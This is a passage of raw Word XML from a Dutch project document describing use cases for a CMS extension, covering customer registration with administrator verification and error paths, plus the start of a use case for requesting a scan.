                            </w:r>
                          </w:p>
                          <w:p w14:paraId="453B617B" w14:textId="6C3D8109" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant is geverifieerd en het bleek een klant te zijn van S5</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="58382AA1" w14:textId="070E5699" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De administrator activeert het account van de klant en er wordt automatisch een email gestuurd naar de klant met bevestiging dat het account is geactiveerd.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C1CE13B" w14:textId="3B490FC6" w:rsidR="00CE4BB5" w:rsidRPr="001D6283" w:rsidRDefault="00CE4BB5" w:rsidP="00DD489B">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="001D6283">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie 1.3a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="13B90031" w14:textId="6E68A0C4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00DD489B">
                            <w:r>
                              <w:t>3a – Foutieve waarde(s) ingevuld</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C956EC0" w14:textId="11AF334C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="58"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem geeft aan dat de klant incorrecte waardes heeft ingevuld</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1021CDA1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="58"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Het systeem stuurt het formulier niet </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0C636D16" w14:textId="25F4A18D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="58"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant mag het nogmaals proberen</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="60FE690D" w14:textId="15D031C2" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="001D6283">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0065233A">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie 1.4a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6F11A3CF" w14:textId="58EA3FB1" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="001D6283">
                            <w:r>
                              <w:t>4a – het verwerken van de data gaat fout</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4E979055" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="59"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Het systeem kan de data niet opslaan in de database vanwege een netwerkprobleem. De klant krijgt een email dat de registratie mislukt is. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="389720ED" w14:textId="2788F93A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="59"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant mag het nogmaals proberen.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="55847F76" w14:textId="4146E9C0" w:rsidR="00CE4BB5" w:rsidRPr="00AF4250" w:rsidRDefault="00CE4BB5" w:rsidP="004D0E93">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AF4250">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie 1.5a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="52C63E4B" w14:textId="2E80A808" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="004D0E93">
                            <w:r>
                              <w:t>5a – De aanmelder is geen klant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1DED2A68" w14:textId="3F55238A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="60"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De administrator wijst de geregistreerde account af in het systeem</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="53ECD285" w14:textId="40413C33" w:rsidR="00CE4BB5" w:rsidRPr="0065233A" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="60"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem stuur de aanmelder een email met uitleg over de afwijzing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846D92" id="Text Box 61" o:spid="_x0000_s1123" type="#_x0000_t202" style="position:absolute;margin-left:-.65pt;margin-top:27.8pt;width:456.5pt;height:666.5pt;z-index:25186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zMg5wCAADYBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIi1qgFSnqipgmMUCD&#10;iWfXsVtrts+z3SbdX7+zk7QdQ5qY9pLc98fPd3d51RhNtsIHBbakw5MBJcJyqJRdlfTb082HC0pC&#10;ZLZiGqwo6U4EejV7/+6ydlNxCmvQlfAEg9gwrV1J1zG6aVEEvhaGhRNwwqJSgjcsIutXReVZjdGN&#10;Lk4Hg7OiBl85D1yEgNLrVklnOb6Ugsd7KYOIRJcUa4v56/N3mb7F7JJNV565teJdGewfqjBMWUy6&#10;D3XNIiMbr/4IZRT3EEDGEw6mACkVF7kH7GY4eNHN45o5kXtBcILbwxT+X1h+t33wRFUlPRtSYpnB&#10;N3oSTSQfoSEoQnxqF6Zo9ujQMDYox3fu5QGFqe1GepP+2BBBPSK926ObonEUjs8n5+MxqjjqLkZn&#10;o8Rg/OLg7nyInwQYkoiSeny+jCrb3obYmvYmKVsAraobpXVm0siIhfZky/Cxl6thdtUb8wWqVjYZ&#10;DwZ9yjxhyTwX8Fskbf8WPDYZAaz8yBG51lPkuesqTui1KGUq7rRI0bX9KiTinsF6pXzGubCxz5Kt&#10;k5XEZt/i2Nkn17aqtzjvPXJmsHHvbJQFn+Hdw9giXH3vS5atPaJ71HciY7Ns8sBN8lMk0RKqHQ6X&#10;h3Y9g+M3CgfgloX4wDzuIw4N3ph4jx+poS4pdBQla/A/X5Mne1wT1FJS436XNPzYMC8o0Z8tLtBk&#10;OBqlg5CZ0fj8FBl/rFkea+zGLACnCncEq8tkso+6J6UH84ynaJ6yoopZjrlLGntyEdurg6eMi/k8&#10;G+EJcCze2kfHU+gEcxrvp+aZedftQMT1uYP+ErDpi1VobZOnhfkmglR5Tw6odg+A5yMPenfq0n06&#10;5rPV4SDPfgEAAP//AwBQSwMEFAAGAAgAAAAhABl/tEXfAAAACgEAAA8AAABkcnMvZG93bnJldi54&#10;bWxMj8FOwzAQRO9I/IO1SFxQ64SqIQ1xKqjEkQMFoR7deEki4nWwnTT9e5YTPa7maeZtuZ1tLyb0&#10;oXOkIF0mIJBqZzpqFHy8vyxyECFqMrp3hArOGGBbXV+VujDuRG847WMjuIRCoRW0MQ6FlKFu0eqw&#10;dAMSZ1/OWx359I00Xp+43PbyPkkyaXVHvNDqAXct1t/70Sown34+m11tD1P9M4zPd9OrT6RStzfz&#10;0yOIiHP8h+FPn9WhYqejG8kE0StYpCsmFazXGQjON2n6AOLI4CrPM5BVKS9fqH4BAAD//wMAUEsB&#10;Ai0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVz&#10;XS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMv&#10;LnJlbHNQSwECLQAUAAYACAAAACEAiuzMg5wCAADYBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uy&#10;b0RvYy54bWxQSwECLQAUAAYACAAAACEAGX+0Rd8AAAAKAQAADwAAAAAAAAAAAAAAAAD0BAAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAAGAAAAAA==&#10;" fillcolor="#f2f2f2 [3052]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B812EB4" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>UC-1: registreren klant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5972C9F4" w14:textId="0CB33460" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t xml:space="preserve">De klant registreert zichzelf via de </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>CMS extensie</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t xml:space="preserve">. Dit wordt gedaan doormiddel van het invullen van een registratiescanner. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7E044579" w14:textId="0F3906C8" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Acteurs</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18C66C64" w14:textId="66336EA9" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>Klant, API, Administrator</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="788AFAE8" w14:textId="4F889FED" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Preconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="05E99F56" w14:textId="761B1B72" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="56"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De klant heeft de </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>CMS extensie</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t xml:space="preserve"> geïnstalleerd.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="601EA526" w14:textId="54EFAD9B" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                      <w:r w:rsidRPr="00AD7C14">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Postconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6E9267F4" w14:textId="0FD1C94C" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="55"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>De klant krijgt een email bevestiging dat de registratie gelukt is.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1E5947A1" w14:textId="0806AE47" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00F801BE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Succes Scenario</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0358A1BA" w14:textId="3E91A852" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>De klant opent het registratieformulier</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="02BF3BCE" w14:textId="2E53C2E1" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>De CMS toont het registratieformulier</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C46F6E3" w14:textId="06A8D4AB" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>De klant vult het registratieformulier in met de persoonlijke gegevens: naam, achternaam, adres, bedrijfsnaam, email</w:t>
                      </w:r>
                      <w:r>
                        <w:t>, telefoonnummer</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F4ABD54" w14:textId="318E901C" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t>Het CMS gebruikt de API om het formulier in de database (tabel aanmeldingen)</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> op te slaan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="07C0390D" w14:textId="1721CC57" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD7C14">
                        <w:t xml:space="preserve">De administrator </w:t>
                      </w:r>
                      <w:r>
                        <w:t>verifieert of de geregistreerde account een authentieke klant is van S5 door contact met de klant op te zoeken via email of telefoon</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="453B617B" w14:textId="6C3D8109" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant is geverifieerd en het bleek een klant te zijn van S5</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="58382AA1" w14:textId="070E5699" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="57"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De administrator activeert het account van de klant en er wordt automatisch een email gestuurd naar de klant met bevestiging dat het account is geactiveerd.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C1CE13B" w14:textId="3B490FC6" w:rsidR="00CE4BB5" w:rsidRPr="001D6283" w:rsidRDefault="00CE4BB5" w:rsidP="00DD489B">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="001D6283">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie 1.3a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="13B90031" w14:textId="6E68A0C4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00DD489B">
                      <w:r>
                        <w:t>3a – Foutieve waarde(s) ingevuld</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C956EC0" w14:textId="11AF334C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="58"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem geeft aan dat de klant incorrecte waardes heeft ingevuld</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1021CDA1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="58"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Het systeem stuurt het formulier niet </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0C636D16" w14:textId="25F4A18D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="58"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant mag het nogmaals proberen</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="60FE690D" w14:textId="15D031C2" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="001D6283">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0065233A">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie 1.4a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6F11A3CF" w14:textId="58EA3FB1" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="001D6283">
                      <w:r>
                        <w:t>4a – het verwerken van de data gaat fout</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4E979055" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="59"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Het systeem kan de data niet opslaan in de database vanwege een netwerkprobleem. De klant krijgt een email dat de registratie mislukt is. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="389720ED" w14:textId="2788F93A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="59"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant mag het nogmaals proberen.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="55847F76" w14:textId="4146E9C0" w:rsidR="00CE4BB5" w:rsidRPr="00AF4250" w:rsidRDefault="00CE4BB5" w:rsidP="004D0E93">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AF4250">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie 1.5a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="52C63E4B" w14:textId="2E80A808" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="004D0E93">
                      <w:r>
                        <w:t>5a – De aanmelder is geen klant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1DED2A68" w14:textId="3F55238A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="60"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De administrator wijst de geregistreerde account af in het systeem</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53ECD285" w14:textId="40413C33" w:rsidR="00CE4BB5" w:rsidRPr="0065233A" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="60"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem stuur de aanmelder een email met uitleg over de afwijzing</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00556C5C">
        <w:t>Usecase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00556C5C">
        <w:t xml:space="preserve"> bijlage 5.1.3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="35B277D2" w14:textId="7D94D23F" w:rsidR="0061509C" w:rsidRDefault="00377148">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="0061509C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251869184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="250E43B1" wp14:editId="70EFD6DF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>16510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5734050" cy="7785735"/>
                <wp:effectExtent l="0" t="0" r="31750" b="37465"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="49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7785735"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5766A7E9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A97198" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>UC-2: Aanvraag scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="184473C2" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t xml:space="preserve">De klant vraagt een scan aan via de </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>CMS extensie</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>. Dit wordt gedaan doormiddel van het invullen van een online formulier.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1519925A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00C34CD5">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Acteurs</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11103501" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00C34CD5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Klant, API</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00C34CD5">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35CE2495" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A97198" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Preconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="405E2AF7" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="22"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De klant heeft de </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>CMS extensie</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> geïnstalleerd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="77A32077" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="22"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant heeft zich geregistreerd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="48217429" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00834F03" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00834F03">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Postconditie</w:t>
